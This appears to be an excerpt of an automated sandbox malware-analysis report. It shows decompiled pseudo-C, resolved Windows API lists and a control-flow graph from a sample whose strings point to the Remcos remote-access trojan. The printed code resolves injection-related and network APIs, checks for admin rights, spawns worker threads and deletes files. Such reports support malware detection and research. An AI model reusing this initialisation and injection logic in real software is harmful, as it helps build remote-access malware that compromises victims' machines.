                    				_t48 = "kernel32.dll";
                    				 *0x473adc = _t22;
                    				 *0x473b14 = GetProcAddress(GetModuleHandleA(_t48), "GetSystemTimes");
                    				 *0x473ad8 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
                    				_t28 = GetProcAddress(LoadLibraryA(_t48), "GetConsoleWindow");
                    				_t49 = "ntdll";
                    				 *0x473b18 = _t28;
                    				 *0x473b10 = GetProcAddress(GetModuleHandleA(_t49), "NtSuspendProcess");
                    				_t32 = GetProcAddress(GetModuleHandleA(_t49), "NtResumeProcess");
                    				_t43 = "Iphlpapi.dll";
                    				 *0x473b00 = _t32;
                    				_t33 = LoadLibraryA(_t43); // executed
                    				 *0x473b24 = GetProcAddress(_t33, "GetExtendedTcpTable");
                    				_t36 = GetProcAddress(LoadLibraryA(_t43), "GetExtendedUdpTable");
                    				 *0x473b20 = _t36;
                    				return _t36;
                    			}



















                    0x0041c5ef
                    0x0041c5fa
                    0x0041c603
                    0x0041c60b
                    0x0041c612
                    0x0041c61f
                    0x0041c61f
                    0x0041c631
                    0x0041c633
                    0x0041c63a
                    0x0041c64b
                    0x0041c64b
                    0x0041c65d
                    0x0041c66c
                    0x0041c673
                    0x0041c678
                    0x0041c689
                    0x0041c69d
                    0x0041c6ad
                    0x0041c6b5
                    0x0041c6bc
                    0x0041c6c1
                    0x0041c6d2
                    0x0041c6e2
                    0x0041c6ea
                    0x0041c6f1
                    0x0041c6f6
                    0x0041c708
                    0x0041c718
                    0x0041c720
                    0x0041c727
                    0x0041c72c
                    0x0041c737
                    0x0041c745
                    0x0041c74c
                    0x0041c751
                    0x0041c757
                    0x0041c762
                    0x0041c76a
                    0x0041c76f
                    0x0041c775

                    APIs
                    • LoadLibraryA.KERNEL32(Psapi.dll,GetProcessImageFileNameW,?,?,?,?,0040E7EA), ref: 0041C5FA
                    • GetProcAddress.KERNEL32(00000000), ref: 0041C603
                    • GetModuleHandleA.KERNEL32(Kernel32.dll,GetProcessImageFileNameW,?,?,?,?,0040E7EA), ref: 0041C61A
                    • GetProcAddress.KERNEL32(00000000), ref: 0041C61D
                    • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E7EA), ref: 0041C62E
                    • GetProcAddress.KERNEL32(00000000), ref: 0041C631
                    • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040E7EA), ref: 0041C646
                    • GetProcAddress.KERNEL32(00000000), ref: 0041C649
                    • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040E7EA), ref: 0041C65A
                    • GetProcAddress.KERNEL32(00000000), ref: 0041C65D
                    • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040E7EA), ref: 0041C669
                    • GetProcAddress.KERNEL32(00000000), ref: 0041C66C
                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E7EA), ref: 0041C67E
                    • GetProcAddress.KERNEL32(00000000), ref: 0041C681
                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E7EA), ref: 0041C68E
                    • GetProcAddress.KERNEL32(00000000), ref: 0041C691
                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E7EA), ref: 0041C6A2
                    • GetProcAddress.KERNEL32(00000000), ref: 0041C6A5
                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E7EA), ref: 0041C6B2
                    • GetProcAddress.KERNEL32(00000000), ref: 0041C6B5
                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E7EA), ref: 0041C6C7
                    • GetProcAddress.KERNEL32(00000000), ref: 0041C6CA
                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E7EA), ref: 0041C6D7
                    • GetProcAddress.KERNEL32(00000000), ref: 0041C6DA
                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E7EA), ref: 0041C6E7
                    • GetProcAddress.KERNEL32(00000000), ref: 0041C6EA
                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040E7EA), ref: 0041C6FC
                    • GetProcAddress.KERNEL32(00000000), ref: 0041C6FF
                    • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040E7EA), ref: 0041C70D
                    • GetProcAddress.KERNEL32(00000000), ref: 0041C710
                    • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040E7EA), ref: 0041C71D
                    • GetProcAddress.KERNEL32(00000000), ref: 0041C720
                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E7EA), ref: 0041C732
                    • GetProcAddress.KERNEL32(00000000), ref: 0041C735
                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E7EA), ref: 0041C742
                    • GetProcAddress.KERNEL32(00000000), ref: 0041C745
                    • LoadLibraryA.KERNEL32(Iphlpapi.dll,GetExtendedTcpTable,?,?,?,?,0040E7EA), ref: 0041C757
                    • GetProcAddress.KERNEL32(00000000), ref: 0041C75A
                    • LoadLibraryA.KERNEL32(Iphlpapi.dll,GetExtendedUdpTable,?,?,?,?,0040E7EA), ref: 0041C767
                    • GetProcAddress.KERNEL32(00000000), ref: 0041C76A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$HandleModule$LibraryLoad
                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi.dll$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll$ntdll.dll$shcore$user32
                    • API String ID: 551388010-1610848713
                    • Opcode ID: 8c9459f35f478f020714d456c8052482eec2a41f0d3faf426e0bde7784266856
                    • Instruction ID: 75682162f21896d86131ea81a8f691010c1ee3cba4bbbbffd5000705d88586ee
                    • Opcode Fuzzy Hash: 8c9459f35f478f020714d456c8052482eec2a41f0d3faf426e0bde7784266856
                    • Instruction Fuzzy Hash: B731AFA0E4035C79D6107FB65C4AE1B7E5CD980B55311482BB448D7151FFBCEA809EEE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 5 40e7ce-40e850 call 41c5e5 GetModuleFileNameW call 40f1cc call 4020f6 * 2 call 41b8b0 call 40f920 call 401e8d call 43f6e0 22 40e852-40e897 call 40f9bc call 401e65 call 401fab call 410d40 call 40f96d call 40f1b9 5->22 23 40e89c-40e964 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 48 40ecfb-40ed0c call 401fd8 22->48 69 40e966-40e9b1 call 406b45 call 401fe2 call 401fd8 call 401fab call 4130f7 23->69 70 40e9b7-40e9d2 call 401e65 call 40b832 23->70 69->70 102 40f158-40f173 call 401fab call 413557 call 41227e 69->102 80 40e9d4-40e9f3 call 401fab call 4130f7 70->80 81 40ea0c-40ea13 call 40ce72 70->81 80->81 98 40e9f5-40ea0b call 401fab call 413557 80->98 90 40ea15-40ea17 81->90 91 40ea1c-40ea23 81->91 94 40ecfa 90->94 95 40ea25 91->95 96 40ea27-40ea33 call 41ad58 91->96 94->48 95->96 103 40ea35-40ea37 96->103 104 40ea3c-40ea40 96->104 98->81 123 40f178-40f1a9 call 41b6f3 call 401f04 call 4135d1 call 401f09 * 2 102->123 103->104 107 40ea42 call 40763d 104->107 108 40ea7f-40ea92 call 401e65 call 401fab 104->108 116 40ea47-40ea49 107->116 130 40ea94 call 40767c 108->130 131 40ea99-40eb21 call 401e65 call 41b6f3 call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->131 119 40ea55-40ea68 call 401e65 call 401fab 116->119 120 40ea4b-40ea50 call 40765f call 407187 116->120 119->108 141 40ea6a-40ea70 119->141 120->119 157 40f1ae-40f1b8 call 40db4b call 414b37 123->157 130->131 177 40eb23-40eb3c call 401e65 call 401fab call 43b4cb 131->177 178 40eb89-40eb8d 131->178 141->108 144 40ea72-40ea78 141->144 144->108 147 40ea7a call 407187 144->147 147->108 177->178 205 40eb3e-40eb84 call 401e65 call 401fab call 401e65 call 401fab call 40d83d call 401f13 call 401f09 177->205 180 40eb93-40eb9a 178->180 181 40ed0f-40ed6f call 4368a0 call 40247c call 401fab * 2 call 4132a6 call 408f7e 178->181 184 40ec18-40ec22 call 408f7e 180->184 185 40eb9c-40ec16 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cc02 180->185 236 40ed74-40edc8 call 401e65 call 401fab call 402093 call 401fab call 41331d call 401e65 call 401fab call 43b4a1 181->236 192 40ec27-40ec4b call 40247c call 4341b6 184->192 185->192 213 40ec5a 192->213 214 40ec4d-40ec58 call 4368a0 192->214 205->178 216 40ec5c-40eca7 call 401f04 call 43f1e4 call 40247c call 401fab call 40247c call 401fab call 4134f5 213->216 214->216 273 40ecac-40ecd1 call 4341bf call 401e65 call 40b832 216->273 286 40ede5-40ede7 236->286 287 40edca 236->287 273->236 288 40ecd7-40ecf6 call 401e65 call 41b6f3 call 40f27d 273->288 290 40ede9-40edeb 286->290 291 40eded 286->291 289 40edcc-40ede3 call 41c7b9 CreateThread 287->289 288->236 306 40ecf8 288->306 294 40edf3-40eecf call 402093 * 2 call 41af84 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43b4a1 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409d0b call 401e65 call 401fab 289->294 290->289 291->294 344 40eed1-40ef08 call 433f08 call 401e65 call 401fab CreateThread 294->344 345 40ef0a 294->345 306->94 347 40ef0c-40ef24 call 401e65 call 401fab 344->347 345->347 357 40ef62-40ef75 call 401e65 call 401fab 347->357 358 40ef26-40ef5d call 433f08 call 401e65 call 401fab CreateThread 347->358 368 40efd5-40efe8 call 401e65 call 401fab 357->368 369 40ef77-40efd0 call 401e65 call 401fab call 401e65 call 401fab call 40d7f1 call 401f13 call 401f09 CreateThread 357->369 358->357 380 40f023-40f047 call 41b0a2 call 401f13 call 401f09 368->380 381 40efea-40f01e call 401e65 call 401fab call 401e65 call 401fab call 43b4a1 call 40bfd7 368->381 369->368 400 40f049-40f04a SetProcessDEPPolicy 380->400 401 40f04c-40f05f CreateThread 380->401 381->380 400->401 404 40f061-40f06b CreateThread 401->404 405 40f06d-40f074 401->405 404->405 408 40f082-40f089 405->408 409 40f076-40f080 CreateThread 405->409 412 40f097 408->412 413 40f08b-40f08e 408->413 409->408 418 40f09c-40f0d0 call 402093 call 4052fd call 402093 call 41af84 call 401fd8 412->418 415 40f090-40f095 413->415 416 40f0d5-40f0e8 call 401fab call 4130ad 413->416 415->418 425 40f0ed-40f0f0 416->425 418->416 425->157 428 40f0f6-40f136 call 41b6f3 call 401f04 call 4131c9 call 401f09 call 401f04 425->428 443 40f14f-40f154 DeleteFileW 428->443 444 40f156 443->444 445 40f138-40f13b 443->445 444->123 445->123 446 40f13d-40f14a Sleep call 401f04 445->446 446->443
                    C-Code - Quality: 91%
                    			E0040E7CE(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a12) {
                    				char _v524;
                    				char _v700;
                    				char _v720;
                    				char _v724;
                    				char _v728;
                    				char _v752;
                    				char _v756;
                    				char _v760;
                    				char _v776;
                    				struct _SECURITY_ATTRIBUTES* _v780;
                    				char _v784;
                    				void* _v788;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t76;
                    				void* _t79;
                    				char* _t94;
                    				void* _t95;
                    				struct _SECURITY_ATTRIBUTES* _t96;
                    				struct _SECURITY_ATTRIBUTES* _t97;
                    				struct _SECURITY_ATTRIBUTES* _t98;
                    				struct _SECURITY_ATTRIBUTES* _t100;
                    				void* _t117;
                    				void* _t118;
                    				void* _t125;
                    				char _t131;
                    				struct _SECURITY_ATTRIBUTES** _t136;
                    				signed char* _t138;
                    				void* _t141;
                    				void* _t143;
                    				void* _t145;
                    				void* _t148;
                    				void* _t161;
                    				struct _SECURITY_ATTRIBUTES* _t164;
                    				intOrPtr _t166;
                    				struct _SECURITY_ATTRIBUTES* _t167;
                    				struct _SECURITY_ATTRIBUTES* _t174;
                    				WCHAR* _t182;
                    				struct _SECURITY_ATTRIBUTES* _t183;
                    				intOrPtr _t197;
                    				intOrPtr* _t200;
                    				void* _t202;
                    				void* _t207;
                    				char* _t210;
                    				void* _t212;
                    				void* _t220;
                    				void* _t226;
                    				void* _t227;
                    				signed int _t228;
                    				char* _t235;
                    				void* _t237;
                    				intOrPtr* _t246;
                    				void* _t248;
                    				intOrPtr* _t256;
                    				void* _t258;
                    				struct _SECURITY_ATTRIBUTES* _t273;
                    				void* _t284;
                    				struct _SECURITY_ATTRIBUTES* _t285;
                    				struct _SECURITY_ATTRIBUTES* _t295;
                    				intOrPtr* _t303;
                    				void* _t322;
                    				char* _t384;
                    				signed int _t416;
                    				signed int _t420;
                    				char _t422;
                    				void* _t425;
                    				void* _t479;
                    				void* _t497;
                    				struct _SECURITY_ATTRIBUTES* _t498;
                    				void* _t499;
                    				char* _t504;
                    				intOrPtr* _t506;
                    				void* _t509;
                    				void* _t510;
                    				struct _SECURITY_ATTRIBUTES* _t511;
                    				void* _t512;
                    				signed int _t516;
                    				signed int _t518;
                    				void* _t521;
                    				void* _t522;
                    				void* _t523;
                    				void* _t525;
                    				void* _t526;
                    				void* _t527;
                    				void* _t528;
                    				void* _t529;
                    				void* _t530;
                    				void* _t534;
                    				void* _t536;
                    
                    				_t536 = __eflags;
                    				_t479 = __edx;
                    				_t516 = _t518;
                    				 *0x471d40 = _a4;
                    				_push(_t284);
                    				E0041C5E5();
                    				_t498 = 0;
                    				GetModuleFileNameW(0, "C:\Users\hardz\Desktop\BiU282bjyR.exe", 0x104);
                    				E0040F1CC( &_v724, _t479, _t536);
                    				_t521 = (_t518 & 0xfffffff8) - 0x2f4;
                    				E004020F6(_t284, _t521, _t479, _t536, 0x474350);
                    				_t522 = _t521 - 0x18;
                    				E004020F6(_t284, _t522, _t479, _t536,  &_v728);
                    				_t76 = E0041B8B0( &_v756, _t479);
                    				_t523 = _t522 + 0x30;
                    				E0040F920(_t479, _t76);
                    				E00401E8D( &_v760, _t479);
                    				_t79 = E0043F6E0(_a12, "-l");
                    				_t303 = _t497;
                    				if(_t79 != 0) {
                    					_t285 = 3;
                    					_t502 = 0x4740cc;
                    					__eflags =  *((char*)(E00401FAB(E00401E65(0x4740cc, _t479, _t516, __eflags, _t285))));
                    					 *0x471b32 = __eflags != 0;
                    					_t481 = E0040531E( &_v784, "Software\\", _t516, E00401E65(0x4740cc, _t479, _t516, __eflags, 0xe));
                    					E00401FE2(0x4742d8, _t83, 0x4740cc, E00406383(_t285,  &_v756, _t83, 0, _t516, __eflags, "\\"));
                    					E00401FD8();
                    					E00401FD8();
                    					E00401FC0(0x474308, E00401E65(0x4740cc, _t83, _t516, __eflags, 0xe));
                    					L00405AA6(_t285, 0x474368, _t83, "Exe");
                    					E00401E65(0x4740cc, _t83, _t516, __eflags, 0x32);
                    					__eflags =  *((char*)(E004051E3(0)));
                    					 *0x471d4b = __eflags != 0;
                    					E00401E65(0x4740cc, _t83, _t516, __eflags, 0x33);
                    					_t94 = E004051E3(0);
                    					__eflags =  *_t94;
                    					 *0x471d60 =  *_t94 != 0;
                    					__eflags =  *0x471d4b;
                    					if(__eflags == 0) {
                    						L5:
                    						_v780 = _t498;
                    						_t95 = E00401E65(_t502, _t481, _t516, __eflags, 0xd);
                    						_t482 = "0";
                    						_t322 = _t95;
                    						_t96 = E0040B832(__eflags);
                    						__eflags = _t96;
                    						if(_t96 != 0) {
                    							_t482 = E00401FAB(0x4742d8);
                    							_t273 = E004130F7(_t272, "Inj",  &_v780);
                    							_pop(_t322);
                    							__eflags = _t273;
                    							if(_t273 != 0) {
                    								_t482 = E00401FAB(0x4742d8);
                    								E00413557(_t274, __eflags, "Inj");
                    								_pop(_t322);
                    							}
                    						}
                    						_t97 = E0040CE72();
                    						__eflags = _t97;
                    						if(_t97 != 0) {
                    							_t98 =  *0x473aec; // 0x0
                    							__eflags = _t98;
                    							if(__eflags != 0) {
                    								_t98->nLength(); // executed
                    							}
                    							E0041AD58(_t322, __eflags); // executed
                    							_t100 =  *0x473af8;
                    							__eflags = _t100;
                    							if(_t100 != 0) {
                    								 *0x4709d0 = _t100->nLength();
                    							}
                    							__eflags = _v780 - _t498;
                    							if(__eflags == 0) {
                    								__eflags = E0040763D(_t322);
                    								if(__eflags != 0) {
                    									E0040765F();
                    									E00407187(_t502);
                    								}
                    								__eflags =  *((char*)(E00401FAB(E00401E65(_t502, _t482, _t516, __eflags, 0x2e))));
                    								if(__eflags != 0) {
                    									__eflags =  *0x473af8 - _t498; // 0x759de630
                    									if(__eflags != 0) {
                    										__eflags =  *0x4709d0 - _t498; // 0x1
                    										if(__eflags == 0) {
                    											E00407187(_t502);
                    										}
                    									}
                    								}
                    							}
                    							__eflags =  *((char*)(E00401FAB(E00401E65(_t502, _t482, _t516, __eflags, 0x27))));
                    							if(__eflags != 0) {
                    								E0040767C();
                    							}
                    							_t483 = E00401E65(_t502, _t482, _t516, __eflags, 0xe);
                    							E00401F13(0x4742a8, _t103, _t502, E0041B6F3( &_v780, _t103));
                    							E00401F09();
                    							__eflags =  *((char*)(E00401FAB(E00401E65(_t502, _t103, _t516, __eflags, 4))));
                    							 *0x471b33 = __eflags != 0;
                    							__eflags =  *((char*)(E00401FAB(E00401E65(_t502, _t103, _t516, __eflags, 5))));
                    							 *0x471b30 = __eflags != 0;
                    							__eflags =  *((char*)(E00401FAB(E00401E65(_t502, _t103, _t516, __eflags, 8))));
                    							 *0x471b31 = __eflags != 0;
                    							__eflags =  *((char*)(E00401FAB(E00401E65(_t502, _t103, _t516, __eflags, _t285))));
                    							if(__eflags != 0) {
                    								__eflags = E0043B4CB(E00401FAB(E00401E65(_t502, _t483, _t516, __eflags, 0x30)));
                    								if(__eflags != 0) {
                    									_t256 = E00401FAB(E00401E65(_t502, _t483, _t516, __eflags, 9));
                    									_t258 = E00401FAB(E00401E65(0x4740cc, _t483, _t516, __eflags, 0x30));
                    									_t483 =  *_t256;
                    									E00401F13(0x4742f0,  *_t256, _t256, E0040D83D( &_v784,  *_t256, _t258));
                    									E00401F09();
                    									_t502 = 0x4740cc;
                    								}
                    							}
                    							__eflags = _v780 - _t498;
                    							if(_v780 != _t498) {
                    								E004368A0(_t498,  &_v524, _t498, 0x208);
                    								_t286 = 0x474320;
                    								_t117 = E0040247C();
                    								_t118 = E00401FAB(0x474320);
                    								_t484 = E00401FAB(0x4742d8);
                    								E004132A6(_t120, "exepath",  &_v524, 0x208, _t118, _t117);
                    								_t525 = _t523 + 0x20;
                    								L00408F7E(0x474320, 0x4742c0, _t120,  &_v524);
                    								_t504 = 0x4740cc;
                    								goto L39;
                    							} else {
                    								__eflags =  *0x471b32;
                    								if(__eflags == 0) {
                    									L00408F7E(_t285, 0x4742c0, _t483, "C:\Users\hardz\Desktop\BiU282bjyR.exe");
                    								} else {
                    									E00401FAB(E00401E65(_t502, _t483, _t516, __eflags, 0x1e));
                    									_t295 =  *((intOrPtr*)(E00401FAB(E00401E65(_t502, _t483, _t516, __eflags, 0xc))));
                    									_t246 = E00401FAB(E00401E65(_t502, _t483, _t516, __eflags, 9));
                    									__eflags = _t295;
                    									_t502 = _t246;
                    									__eflags = _t295;
                    									_t248 = E00401FAB(E00401E65(0x4740cc, _t483, _t516, _t295, 0xa));
                    									E0040CC02( *_t246, E00401FAB(E00401E65(0x4740cc, _t483, _t516, __eflags, 0x30)), __eflags, _t248, ((_t245 & 0xffffff00 | _t295 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t245 & 0xffffff00 | _t295 != 0x00000000) & 0x000000ff);
                    									_t523 = _t523 + 0xc;
                    								}
                    								_t220 = E0040247C();
                    								_t425 = 2;
                    								_t292 =  ~(__eflags > 0) | (_t220 + 0x00000001) * 0x004742c0;
                    								_push( ~(__eflags > 0) | (_t220 + 0x00000001) * 0x004742c0);
                    								_t511 = E004341B6(_t425, (_t220 + 1) * 0x4742c0 >> 0x20, _t502, __eflags);
                    								__eflags = _t511;
                    								if(_t511 == 0) {
                    									_t511 = _t498;
                    								} else {
                    									E004368A0(_t498, _t511, _t498, _t292);
                    									_t523 = _t523 + 0xc;
                    								}
                    								E0043F1E4(_t511, E00401F04(0x4742c0));
                    								_t286 = 0x474320;
                    								_t226 = E0040247C();
                    								_t227 = E00401FAB(0x474320);
                    								_t228 = E0040247C();
                    								E004134F5(E00401FAB(0x4742d8), __eflags, "exepath", _t511, 2 + _t228 * 2, _t227, _t226); // executed
                    								E004341BF(_t511);
                    								_t525 = _t523 + 0x1c;
                    								_t504 = 0x4740cc;
                    								E00401E65(0x4740cc, _t230, _t516, __eflags, 0xd);
                    								_t484 = "0";
                    								__eflags = E0040B832(__eflags);
                    								if(__eflags == 0) {
                    									L39:
                    									_push(1);
                    									_t125 = E00401FAB(E00401E65(_t504, _t484, _t516, __eflags, 0x34));
                    									_t526 = _t525 - 0x18;
                    									E00402093(_t286, _t526, _t484, _t516, _t125);
                    									_push("licence");
                    									_t485 = E00401FAB(0x4742d8); // executed
                    									E0041331D(0x4742d8, _t127); // executed
                    									_t527 = _t526 + 0x20;
                    									_t131 = E0043B4A1(_t129, E00401FAB(E00401E65(_t504, _t127, _t516, __eflags, 0x28)));
                    									 *0x471d48 = _t131;
                    									__eflags = _t131 - 2;
                    									if(_t131 != 2) {
                    										__eflags = _t131 - 1;
                    										if(_t131 != 1) {
                    											_t499 = CreateThread;
                    										} else {
                    											_t422 = 0;
                    											goto L41;
                    										}
                    									} else {
                    										_t422 = 1;
                    										L41:
                    										E0041C7B9(_t286, _t422, _t485, _t498);
                    										_t499 = CreateThread;
                    										CreateThread(_t498, _t498, E0041CE7B, _t498, _t498, _t498);
                    									}
                    									_t528 = _t527 - 0x18;
                    									E00402093(_t286, _t528, _t485, _t516, "Remcos Agent initialized");
                    									_t529 = _t528 - 0x18;
                    									E00402093(_t286, _t529, _t485, _t516, "i");
                    									E0041AF84(_t286, _t499);
                    									_t530 = _t529 + 0x30;
                    									_t136 = E00401FAB(E00401E65(_t504, _t485, _t516, __eflags, 0xb));
                    									_t138 = E00401FAB(E00401E65(_t504, _t485, _t516, __eflags, 0x10));
                    									__eflags =  *_t136;
                    									_t505 = _t138;
                    									_t141 = E0043B4A1(_t139, E00401FAB(E00401E65(0x4740cc, _t485, _t516,  *_t136, 7)));
                    									_t143 = E00401FAB(E00401E65(0x4740cc, _t485, _t516, __eflags, 0x11));
                    									_t145 = E00401FAB(E00401E65(0x4740cc, _t485, _t516, __eflags, 0x31));
                    									_t148 = E00401FAB(E00401E65(0x4740cc, _t485, _t516, __eflags, 0x2a));
                    									E00409D0B(0x4740cc, 0x4740d8, __eflags, StrToIntA(E00401FAB(E00401E65(0x4740cc, _t485, _t516, __eflags, 0xf))), _t148,  *_t138 & 0x000000ff, _t145, _t143, _t141, (_t137 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff); // executed
                    									__eflags =  *((char*)(E00401FAB(E00401E65(0x4740cc, _t485, _t516, __eflags, 0x14)))) - 1;
                    									if(__eflags != 0) {
                    										_t285 = 0;
                    										__eflags = 0;
                    									} else {
                    										_t212 = 2;
                    										_t510 = E00433F08(_t485, _t505, __eflags, _t212);
                    										_t285 = 0;
                    										 *_t510 = 0;
                    										_t420 = E00401E65(0x4740cc, _t485, _t516, __eflags, 0x35);
                    										__eflags =  *(E00401FAB(_t420));
                    										 *((char*)(_t510 + 1)) = _t420 & 0xffffff00 | __eflags != 0x00000000;
                    										CreateThread(0, 0, E00419A49, _t510, 0, 0);
                    									}
                    									_t502 = 0x4740cc;
                    									__eflags =  *((char*)(E00401FAB(E00401E65(0x4740cc, _t485, _t516, __eflags, 0x16)))) - 1;
                    									if(__eflags == 0) {
                    										_t207 = 2;
                    										_t509 = E00433F08(_t485, 0x4740cc, __eflags, _t207);
                    										 *_t509 = 1;
                    										_t416 = E00401E65(0x4740cc, _t485, _t516, __eflags, 0x35);
                    										_t210 = E00401FAB(_t416);
                    										__eflags =  *_t210;
                    										_t49 =  *_t210 != 0;
                    										__eflags = _t49;
                    										 *((char*)(_t509 + 1)) = _t416 & 0xffffff00 | _t49;
                    										CreateThread(_t285, _t285, E00419A49, _t509, _t285, _t285);
                    										_t502 = 0x4740cc;
                    									}
                    									__eflags =  *((char*)(E00401FAB(E00401E65(_t502, _t485, _t516, __eflags, 0x23)))) - 1;
                    									if(__eflags == 0) {
                    										 *0x471a85 = 1;
                    										_t200 = E00401FAB(E00401E65(_t502, _t485, _t516, __eflags, 0x25));
                    										_t202 = E00401FAB(E00401E65(0x4740cc, _t485, _t516, __eflags, 0x26));
                    										_t485 =  *_t200;
                    										E00401F13(0x473d4c,  *_t200, _t200, E0040D7F1( &_v784,  *_t200, _t202));
                    										E00401F09();
                    										CreateThread(_t285, _t285, E00401BE9, _t285, _t285, _t285);
                    										_t502 = 0x4740cc;
                    									}
                    									__eflags =  *((char*)(E00401FAB(E00401E65(_t502, _t485, _t516, __eflags, 0x2b)))) - 1;
                    									if(__eflags == 0) {
                    										_t502 = E00401FAB(E00401E65(_t502, _t485, _t516, __eflags, 0x2c));
                    										_t197 = E0043B4A1(_t195, E00401FAB(E00401E65(0x4740cc, _t485, _t516, __eflags, 0x2d)));
                    										__eflags =  *_t502;
                    										_t485 = _t197;
                    										__eflags =  *_t502 != 0;
                    										E0040BFD7(_t197);
                    									}
                    									_t161 = E0041B0A2( &_v776, _t485, _t499, __eflags); // executed
                    									E00401F13(0x474338, _t485, _t502, _t161);
                    									E00401F09();
                    									_t164 =  *0x473af0;
                    									__eflags = _t164;
                    									if(_t164 != 0) {
                    										_t164->nLength(_t285); // executed
                    									}
                    									CreateThread(_t285, _t285, E0040F5B0, _t285, _t285, _t285); // executed
                    									__eflags =  *0x471d4b;
                    									if( *0x471d4b != 0) {
                    										CreateThread(_t285, _t285, E00411F00, _t285, _t285, _t285);
                    									}
                    									__eflags =  *0x471d60;
                    									if( *0x471d60 != 0) {
                    										CreateThread(_t285, _t285, E004124E4, _t285, _t285, _t285);
                    									}
                    									_t166 =  *0x4709d0; // 0x1
                    									_t167 = _t166 - _t285;
                    									__eflags = _t167;
                    									if(__eflags == 0) {
                    										_push("User");
                    										goto L64;
                    									} else {
                    										__eflags = _t167 - 1;
                    										if(__eflags == 0) {
                    											_push("Administrator");
                    											L64:
                    											E004052FD(_t285, _t530 - 0x18, "Access Level: ", _t516, __eflags, E00402093(_t285,  &_v780, _t485, _t516));
                    											E00402093(_t285, _t530 - 4, "Access Level: ", _t516, "i");
                    											E0041AF84(_t285, _t499);
                    											E00401FD8();
                    										}
                    									}
                    									_t498 = 0x4742d8;
                    									_t174 = E004130AD(0x4742d8, E00401FAB(0x4742d8), "del"); // executed
                    									_pop(_t384);
                    									__eflags = _t174;
                    									if(__eflags != 0) {
                    										E004131C9( &_v752, 0x80000001, E00401F04(E0041B6F3( &_v780, 0x4742d8)), L"del");
                    										E00401F09();
                    										_t182 = E00401F04( &_v752);
                    										_t502 = DeleteFileW;
                    										while(1) {
                    											_t183 = DeleteFileW(_t182);
                    											__eflags = _t183;
                    											if(_t183 != 0) {
                    												break;
                    											}
                    											__eflags = _t285 - 0xa;
                    											if(_t285 < 0xa) {
                    												_t285 =  &(_t285->nLength);
                    												__eflags = _t285;
                    												Sleep(0xa);
                    												_t182 = E00401F04( &_v752);
                    												continue;
                    											}
                    											goto L72;
                    										}
                    										goto L72;
                    									}
                    									goto L73;
                    								} else {
                    									_t235 = E00401E65(0x4740cc, "0", _t516, __eflags, 0xd);
                    									_t534 = _t525 - 0x18;
                    									_t484 = _t235;
                    									E0041B6F3(_t534, _t235);
                    									_t237 = E0040F27D(__eflags);
                    									_t525 = _t534 + 0x18;
                    									__eflags = _t237 - 1;
                    									if(__eflags != 0) {
                    										goto L39;
                    									} else {
                    										_push(3);
                    										goto L36;
                    									}
                    								}
                    							}
                    						} else {
                    							_push(2);
                    							L36:
                    							_pop(_t512);
                    							goto L37;
                    						}
                    					} else {
                    						E00401FE2(0x474400, 0x474308, 0x4740cc, E00406B45( &_v776, 0x474308, _t516, "-W"));
                    						E00401FD8();
                    						_v756 = 0;
                    						_t481 = E00401FAB(0x4742d8);
                    						__eflags = E004130F7(_t280, "WD",  &_v756);
                    						if(__eflags != 0) {
                    							E00413557(E00401FAB(0x4742d8), __eflags, "WD");
                    							E0041227E();
                    							L72:
